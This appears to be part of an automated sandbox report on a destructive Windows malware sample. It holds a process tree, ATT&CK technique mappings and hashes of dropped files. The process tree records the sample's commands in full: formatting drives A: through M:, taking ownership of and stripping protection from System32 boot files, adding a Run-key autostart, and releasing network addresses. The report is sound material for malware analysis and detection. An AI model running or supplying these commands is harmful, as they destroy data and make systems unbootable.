        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:10144
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:13752
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:13776
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:13800
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:13816
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:13832
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:13860
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:13888
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:13908
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4516
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:4544
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:4552
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    PID:4560
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:4572
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AC.tmp\AD.tmp\AE.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:5564
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:6028
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Possible privilege escalation attempt
        
        PID:5056
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Possible privilege escalation attempt
        
        PID:6124
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3276
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:5972
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        
        PID:6236
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:6416
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:6444
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Modifies file permissions
        
        PID:6664
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        
        PID:6764
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:6848
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:6968
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:6988
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:7316
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:12008
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:12780
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:13204
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:13408
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4584
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:4608
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:4616
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    PID:4632
- - C:\Windows\system32\format.com
    format /y /q A:
    3⤵
    - Enumerates connected drives
    PID:4700
- - C:\Windows\system32\format.com
    format /y /q B:
    3⤵
    PID:4832
- - C:\Windows\system32\format.com
    format /y /q D:
    3⤵
    PID:4880
- - C:\Windows\system32\format.com
    format /y /q E:
    3⤵
    PID:4936
- - C:\Windows\system32\format.com
    format /y /q F:
    3⤵
    PID:5108
- - C:\Windows\system32\format.com
    format /y /q G:
    3⤵
    PID:4732
- - C:\Windows\system32\format.com
    format /y /q H:
    3⤵
    PID:1936
- - C:\Windows\system32\format.com
    format /y /q I:
    3⤵
    PID:4184
- - C:\Windows\system32\format.com
    format /y /q J:
    3⤵
    PID:4464
- - C:\Windows\system32\format.com
    format /y /q K:
    3⤵
    PID:4760
- - C:\Windows\system32\format.com
    format /y /q L:
    3⤵
    PID:4976
- - C:\Windows\system32\format.com
    format /y /q M:
    3⤵
    PID:4784
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\bdaplgin.ax"
    3⤵
    PID:4604
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\bdaplgin.ax" /reset /c /q
    3⤵
    PID:4520
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\bdaplgin.ax"
    3⤵
    PID:4944
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\g711codc.ax"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4260
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\g711codc.ax" /reset /c /q
    3⤵
    PID:5316
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\g711codc.ax"
    3⤵
    PID:5460
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\ksproxy.ax"
    3⤵
    - Possible privilege escalation attempt
    PID:5772
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\ksproxy.ax" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:5244
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\ksproxy.ax"
    3⤵
    PID:5440
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\kstvtune.ax"
    3⤵
    PID:5604
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\kstvtune.ax" /reset /c /q
    3⤵
    PID:6288
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\kstvtune.ax"
    3⤵
    PID:6352
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\Kswdmcap.ax"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:6480
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\Kswdmcap.ax" /reset /c /q
    3⤵
    PID:6692
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\Kswdmcap.ax"
    3⤵
    PID:6732
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\ksxbar.ax"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:6864
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\ksxbar.ax" /reset /c /q
    3⤵
    PID:6996
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\ksxbar.ax"
    3⤵
    - Views/modifies file attributes
    PID:7016
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\Mpeg2Data.ax"
    3⤵
    PID:7132
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\Mpeg2Data.ax" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:6176
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\Mpeg2Data.ax"
    3⤵
    PID:6256
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\mpg2splt.ax"
    3⤵
    PID:6548
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\mpg2splt.ax" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:2552
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\mpg2splt.ax"
    3⤵
    - Views/modifies file attributes
    PID:7084
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\MSDvbNP.ax"
    3⤵
    - Modifies file permissions
    PID:7208
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\MSDvbNP.ax" /reset /c /q
    3⤵
    PID:7508
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\MSDvbNP.ax"
    3⤵
    - Views/modifies file attributes
    PID:7764
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\MSNP.ax"
    3⤵
    - Modifies file permissions
    PID:8372
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\MSNP.ax" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:9044
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\MSNP.ax"
    3⤵
    PID:8604
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\psisrndr.ax"
    3⤵
    PID:10276
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\psisrndr.ax" /reset /c /q
    3⤵
    PID:11360
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\psisrndr.ax"
    3⤵
    - Views/modifies file attributes
    PID:11780
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\VBICodec.ax"
    3⤵
    - Possible privilege escalation attempt
    PID:11268
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\VBICodec.ax" /reset /c /q
    3⤵
    PID:13008
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\VBICodec.ax"
    3⤵
    - Views/modifies file attributes
    PID:13228
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\vbisurf.ax"
    3⤵
    - Possible privilege escalation attempt
    PID:12188
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\vbisurf.ax" /reset /c /q
    3⤵
    PID:13208
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\vbisurf.ax"
    3⤵
    - Views/modifies file attributes
    PID:12960
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\vidcap.ax"
    3⤵
    - Possible privilege escalation attempt
    PID:13656

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-10171986520141595041412525142-6276922501735058401546636590-98415755-1365853588"
1⤵
PID:980

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-697400564-2123935917183677059-305876371-47766596127787064-1624637765-416717756"
1⤵
PID:1724

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19142158301610594258332928201336415091-9587355951319795985334831379-1906408063"
1⤵
PID:2024

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T
1⤵
PID:4708

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1707644266-1889147761-525934916302873984-92603305221552-195861751-1973279068"
1⤵
PID:3844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe

Filesize
112KB

MD5
81a7a946456f1f6dae4715b1feb72ed0

SHA1
af83b938017efd53f95671adc0c6d2aa1088d38e

SHA256
690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408

SHA512
a1ec5c6b1ebb014aa60d0242e147ebbbadd2aff2a0e653b99f440f8d25bb01ee49cddcf6ad608c0adc8a5efc784ff2c949036b447da2912ccc6e684c2cc0e692

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs

Filesize
63B

MD5
4cb4efde0d2476b32d5a347a52df6c1b

SHA1
d2b3d042dfc64cc15b41b83b6f0252497a515e95

SHA256
1db6458800616839e864831147cc6d91845825e365925151f649b5d998152273

SHA512
1a676aec628275f5812bc99f7055713986579304df42328559b7a0adeb99601a2a680144a0f3b1685a0126c034cbf9f75ac89cb5cd1c8ca87f7e68824771ebce

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf

Filesize
74B

MD5
b39df423c6e5978065a9a8ec4879a3b4

SHA1
96441a7a7d8090f7a96a1160f539531f66568e88

SHA256
12a5135510016abcfe1192aceb6fec42634346661d778d68be1debaa3d75e967

SHA512
2d583fcae1ec73f836c5b66b8b1337bb4250a8230073de96d501a4fab5f522b75599ac2a1fcf1457a841d8c84bcccb88feade82f49357b28345c63d9526cfeb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3B5.tmp\B3B6.tmp\B3B7.bat

Filesize
23KB

MD5
afb3843724a58bbbb53fd12a8f42d8e6

SHA1
0835bbceeb20027752c05e48b1b7c4571611f32f

SHA256
53f749148a1e78cf315f16934350a13113705b95d2a375573c7007dfeaba047d

SHA512
8c8ba2b13e6fc63ddb7205ef223a2cf954fdcc8737ee031533d916535df401581dad3c3bd53416340e12569d9ad505051a63edc4f77905dbd96f94eadef84fad

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs

Filesize
57B

MD5
5420b2137427b07b4d6a585ae3b69e08

SHA1
feb511d0b40064ab8a491caf699f5959bc9d4716

SHA256
ae3ab245b4001b487205480988a1aa775de104faf0e5d9c43dd3d1cf285196a1

SHA512
2d5e64f315b8d72e7ff178042cb131baf0d982e74c09455911358ab3552e6e5919ac5f567b1cf31f91ad5613f2b91c5eff5e251e014c230490e4a323da7a7946

Download Submit
C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd

Filesize
30B

MD5
c1d1d009fa868b67fe8ae820ae3a7564

SHA1
5908963134b1dc6b00cd335f42e7721f668f832a

SHA256
721dad6e2ab061b3d306bf39656fc32e82b007b43a7ea5367b69b2a62e51af49

SHA512
671f69f2f037920c78269ad9322f517b10e169d62d8b16aff899e55c66a0560cc5df389e5b2ee1139bef4cfe86263ceadbb705fc7f8a4296430a2a5b46d1eaab

Download Submit
C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd

Filesize
60B

MD5
a12f4d34a99c14c98463e9779ae4c008

SHA1
9677e26fc0711879b5c7f12eadfa6727e4cc63c7

SHA256
9da85b8516711c1e92ab0206908d95699bac1280b1cadb3cef8a554624e95f2b

SHA512
fdc46135ef84c5c3ede54cd09208546052699ed54c1c39c6d409d7a3441a902bb9871452af1f82ce1600c223b2720c25bb6d9194ac80b15ff2955288a0c0a1da

Download Submit
C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd

Filesize
90B

MD5
acba0fe3a48e7297440c136aaf975e44

SHA1
3eafa0722acbafa8cb61eaf1a93d51563c5ec987

SHA256
549bc4d8027b5b82b9b73e89f7c1549d4690c9bea4c13dfaa210a737718b73da

SHA512
cc216231aa16c41b963e1b732f2a5e49ced2efd409137e5c6fd54f4fb52092e951825aba4b5a0b9486c0695336e7b451c849a1422a8741c94ac9aaa1e2cdc4dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd

Filesize
120B

MD5
9512cf977fd3cfacad693e88bc62cc7e

SHA1
006b8a3d5c348e3c2963da33e5b8483c2d9badd1

SHA256
b7f4d2db7506132f6b164931675e8bdc63abdecdc035385ede0e667b5b60945e

SHA512
83ebe1086aa48f9a8a3222f43e5bf3021c1841852d0876f76557b22397d9ece8370fd5cef6717dae2031196246eafe0eb622af65ee1bf1ca7adb4974f5750896

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs

Filesize
71B

MD5
c50b8418d9f7ec5980f0bcd9bca4a735

SHA1
d00d3064b043e6cb78476d7820998d9b89f9fdc7

SHA256
48ee941955387e29c12380d852a363bdf22ef49897c0bd814aaeacba6bc852aa

SHA512
0b71f8c7bb3d9be0017dd30cb25500df4a04d77234c9ed36222fda37af1a2b66dc8fccd2fe8c27f164bef7b892e9a6b1745469623cb71f3c3a1700509165f6f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp

Filesize
14KB

MD5
1bad8558f3516ac2a33bda18398ae7bd

SHA1
ca6e3cdc52e209f639a4e260dd21602baeb4f009

SHA256
f00f4cfb8ff634c4eba20ba674b1906f82c35f7dfc933009ae30203749cef8ee

SHA512
e3b245dfe1b550e2a7ee96952f67039d45dd0d4db1e09ecb4e66516d68a8e4b69e7b607481fa49d0b92557007eee4dbe46276325c3304775202f3db16617a3ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp

Filesize
4KB

MD5
0bbcebceeb481ed6e31abff46f03bb96

SHA1
23bed486ff1f7576657a8216d13665e7ae007d3c

SHA256
ef13d69d5baccbed64b64ebebd7a3009fd00e7ec4c1c5b10e8ada737da1acbeb

SHA512
25fdc2e64c36985a232a2d64ccfb219397d14ed5fc9b1b5992442f0937e151badd6700e4aaf0df8978576e2a16aefdee9f84fb8447e4083d185b5a37eaafd61f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
188B

MD5
a5fa08e54b3818a7ee1d88ea2662d0ee

SHA1
bca38f9f1f103beb93b6ba7451b848edba0be8ee

SHA256
ca105f2e9b178394fe18c299ccb1234d42caa587f090f73ee12bee04fdb04f7b

SHA512
80583a90d237c08514d9113ed1115a0d6e36ca7f754b1a9aaf5b560f78a7885831b5258d0f25705e2701cb15d64d7f99beb7f731ec7d61d4b648fe0ffbb1f782

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
487B

MD5
c19f795ca4624bec7cd7f7c5281392be

SHA1
a929785f12c9750711a098387350ea814a0c2dd3

SHA256
a1a58f05fde14b0f52039a3b26ca7fec9034c87b1c94c0cbdd260b0707fa12eb

SHA512
bed19b90ce499db4bb2841c89c89b7bce685bb6cd24ee31e935c6774021486a1bbc1b79d3f9e9ca0c932bf3455851951c9c3be4fc1598fcdd926bc5be1d2231b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
558B

MD5
0106bdbe4eb94630febbd5ed621e1406

SHA1
bae9f314eb6522941e588cff8a1aafc81783b3b7

SHA256
e47a5c90cf219f9397e79cf95ca7538402a91a8a3236662a638911617c8936d5

SHA512
4ca661155772537468885590af3557fd376ae769fb840064c92f2a1f4759f840e52c5bc11cdd6c808faf6eae611207ca149b55ae23959deb5cfcae9e01271039

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
746B

MD5
44bbf85948a3d5b036f689b2c5142d57

SHA1
7a9ea036610f333a62a96cac0f9e2621083e7a67

SHA256
0b4825794c516bf5f3245fc88af66730e5e9c1cbc73f2ea66143ab7572933f71

SHA512
a90b0c8a821928801b86ddfed0bfa5973ac6dbeebf60aab8a9339eef8a3e64505c735b256d8251fe6a9dbff6326f7248ba28021eb8255a5e8bde614842421af5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
2KB

MD5
da37e8c95bac141be2f8412f381edc10

SHA1
33e4520efac045e4baadccb34c2736fe6e821f36

SHA256
faf9d77b7217894fde116dac68a9db958ffa7292c11e9f8211daf4a99ed4abe2

SHA512
2d54908dbe2f369e56426aa58ff44507b7a1b35da5b5a1d9fa52d11c027401fa8ebf9f6adacf6087e3f9b95679493ec8db4928de90cb549d2b02e794195ad004

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
3KB

MD5
eb11d8c201751b838d9a661f9c64d574

SHA1
688909a8cfe3b8aa613f9ad730e5adb12feb2fd7

SHA256
34a3a7e55d59de01c3d98aa46d76770c835135d9b2bc78cd6caa44fa11ec1dcb

SHA512
0bf9c96e3c36b31ad724b99b9cd2ef867583e89eaf6d3ad825ef74f6cbc177f092a5eb1dcd05f5734373ea2e87f6e6bda72b50c83554094033f15d337865a87a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
4KB

MD5
aa236c0506ccc0b6e32ecb9d3280db9a

SHA1
8a15e8ec35a1ee45262bf05a50eaee2ef48cdaee

SHA256
6493ea28ef60963984f626309c185476758d443ad1aa1af875de7e2a2a2698bf

SHA512
8fe4e5a4c27e3bd97697e889c575a550fefdc65f774881584cb96ccfd58b349cf153cea03437e90b9a672780a4ee14924c95e4bea4c64aa2d3ad8df4d0f661cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
4KB

MD5
b5dee10cc9736e0df67a67ec3a2a11c9

SHA1
219f052409ef4668b569b7f18d050b603aac7ddb

SHA256
6f39c5d4166b168059a9ac42aa79bdffe95dacd0702274bac08e8ce698f91d73

SHA512
b54a58588b6b6f36343564bb1993ff01f00dbd1b5d4e9a886cbd9e6e1a9b75cdc6d71d1c0d4cdaec37ea177a869db8e762d78ab6269579d8c395b2b2baa7fda3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
6KB

MD5
2e38afb61d0c258868f6b3e3f30a324e

SHA1
06cf3756def9db2b244b6d46cb64a834b06bcace

SHA256
415cdbb1212e59487dcb92c4fb554c1374d357666cc2ba4eb0e22ae489ce9076

SHA512
0ea3bb7545f15a06559a93f5c7a9ba483791607a79548c2125e4933f84c765c99623c50ca73590016f623b3dafbb25e9308a1ab2cd6eb083e7f4b3a3d6c5637d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
13KB

MD5
6cc4387947fbedebf05b246abcc6051d

SHA1
4ed3223c93abdea89b3891a450eae67bbe924a99

SHA256
d10aae68bbee7ec7a540dd9ab383df1058d87ac28704d782922fa7edf5562bb2

SHA512
03f0b82cba0a9625ab05ab42f3351d9f168f7ebbf4fc2120118f0a4d72b35134885525faea1007661aae3c44ba6f0fec21a79c501884b507ac62700e484ebf03

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
15KB

MD5
2154374c664177aa892f6a9252929fb0

SHA1
43a9f03a2182f1e31fadfe36ac75b9ebaf3612b8

SHA256
076fff33213160eb2cbcd56e1156ad1fa2cc219c94f6c10a27cc3a6e555d90c4

SHA512
09814ad823f94da62a80a34835a18363f235f14fb572d339b9c7b86def90e8937c2862438075bc3252a538edb903b84a7cc8e54c36f3c711a90670895a1de541

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
18KB

MD5
1ccb1cb134dd5649afd64186cdc6ecd0

SHA1
3fdc3ed5ac365bb053733b29429d08a67cf78f41

SHA256
9b69c9cd0edd3a8b428d33da15b0d69d89d2175d6b51ed13943ab8fac87578e0

SHA512
5a86ac54a251de4e4ef91093a0da979771e6d3e95f6d095e0242820b5ea1b7feff1a01cdc2f682d29c1e20536441909fbdd320f8e674a43563d381dc9392be58

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tasksvc.exe

Filesize
10KB

MD5
0ae0ce4c291c2cf6e1f241a95faa98a1

SHA1
0071093e577bba14f37e17c700885ed72393cb84

SHA256
ffbf5a2f5052dd7cf652c12df320609d147f18b2560e5a0787fc2eed08a4d1f8

SHA512
a6c8f647aeac1f13c857318c79c506dc87f24a2f47de5f7fedec5b4f247688a4a7e378ba6ce73f8d13687051d951182fba9275c35e17766f847a09544d25e928

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.bin

Filesize
17B

MD5
59adfc7490a0adcbf975b2b60393db53

SHA1
3441e301d9f3ffca383fcc5b945fcec25935f527

SHA256
7cc258c1e4db29d4c6785fe967252e18ad5704df42de6aa06f0927fcaa21518c

SHA512
c3ee61354086cdc5d9e915624e8b3a6fa616b679cf45232fc2d57fded13fbadb6a1ac9a11fccf7f9907be5958230993574b3738a32d43e5ee35c97271439e1ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.chk

Filesize
15B

MD5
f9beca352244c6fede648a84221853a0

SHA1
e728f170c987b2a23f0e45ce5cf58cfedbc7b370

SHA256
709d881677da4e324d43b2c7dc271a7ce86573adad79eb1c135a551070f676d4

SHA512
330946a4d16e967ac5c0942bd10ffe27d5bc27a778a06965557a475d6b3df63e34fc60f50e57cde3282baf009c080121ec276bfe2f39cb488389ddbe5cd322cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.cmd

Filesize
17B

MD5
f87a2fef97ae172f17c6c2b06ec2fba3

SHA1
58911bdce48274bc9174c8aacadd709832baffbf

SHA256
ffb3f588c6ae0bee70647a36362a7c4aa53025e2c762adda4378f9c76065a40a

SHA512
7886548f737576fcc12c6911820617c4c72b9085f740e2a2f3651102df4bd55efcda36834af7f422c438ffa171dbc208b4d26b3936afc42003d2940f3d2c9673

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.com

Filesize
15B

MD5
4965bdb1bc5fb04a4b0b6b692f7c7e56

SHA1
23d8df0b7a70f233247e4e1ff83a08f2ab9eafc0

SHA256
2df8ba28a443c20b10a4ac050b39f58806bab088353a8fcbc5bce22afdef5b04

SHA512
5db1e1ad19b5db09667e7408b7f1929691d27c70761b1e39743d255dff3465538d4a83fcadad48134f9fca07044bbe21ee28fecfde3000a9b1212abaf54a1503

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.dat

Filesize
16B

MD5
ba03fef0512f9ec8998eeb0247066ac8

SHA1
14aab1f5402e12a64086a8358e947ec625fec1bb

SHA256
abcf9c397be998a66e84e02383b7cb37cc7f9e975112ada042e83983174a7089

SHA512
337a9714b04f39e0729d15b1031cc1c26e59a5c5b2a12a9e6eddfb3ad720bf9727809197f982250cd77f4da4c678369c76f6c3842410aaea03c39cdf7dba97e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.dll

Filesize
17B

MD5
05d7be0ca5b82cabd5a7ba442d1f5233

SHA1
f1f1f7c8670a97b46222cab22c38184e4ff457a8

SHA256
8b335e5831d2317c5b682798a62177117aab2b3902214c0b20e947f30c40e733

SHA512
f4002d4a151f18c85dc8bec025c6b59ae5e2feda717064ec7a880381efbc98c2d81dae0235acde89d95c8cb69689b6438a1a1d71f6f926a1022697bc8f81d996

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.exe

Filesize
16B

MD5
94339ce2181fa40a21cfe0b662d80c60

SHA1
a9af2cb773b547e877810a1de072d155c1fb042d

SHA256
7df5faa4686219362680e90862dc76f75a866f5899ab97fe64aa615cf18ecf1c

SHA512
c23115b02738f42996c0520aba73fc54a0e4571e367c911b0fd0d620e331ae4735e1d60bffb94c7fec86c4d48d6e2100ea4dcf6fab4557f54d3b8d978c4b592c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.inf

Filesize
16B

MD5
5e06d8c35ec39490545c3a4bfc8b3a13

SHA1
aa9d2a8a6368f9369974215713d4db7b7a51b1e2

SHA256
b09c2309cd55ea80ec5bc53370db59ddfc260ef99ed1239a556f569d11c5eb28

SHA512
debb4d2212b6688e73794bbc0af4ec23b0a13442145b3e349e772c55df1268f708fa795f4c0acd27e54c766348c501d10618809dc56248be0b1501e9bb365fd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.ini

Filesize
16B

MD5
f13bbdc4b59b468f7dfd3d3f72fd827a

SHA1
2ae902f903af43624e9b95eacccb1f39bb801f0e

SHA256
24ab557734652c5ca39f078843550af0f0dfba70431a84d52d553f0df85d3363

SHA512
75482d7eb55fa94bd702fe6bd719d463e0feab6b37f7038df638b68489980ed9a34aaa0114e1e7e9508949d8a72a7798cbc9e1014450a657fc799d0768fb4e52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.iso

Filesize
14B

MD5
14c6e034f903b4e57287bc7d709ebc76

SHA1
08f3b09dddce34171a84627db8bf5417de4ffc32

SHA256
6ec8cab3f4436fdf6794e2a2d3791761f429742520ea3cc754a0b3b091f5af4b

SHA512
9f64c0714274e770ae93eb6214eca7fee2ef3b6254af53c4f7c5518f45aa67d4277de867b9052b0914346afc9b2738054b50bb1a491f55872abcf5a2054d49a1

Download Submit
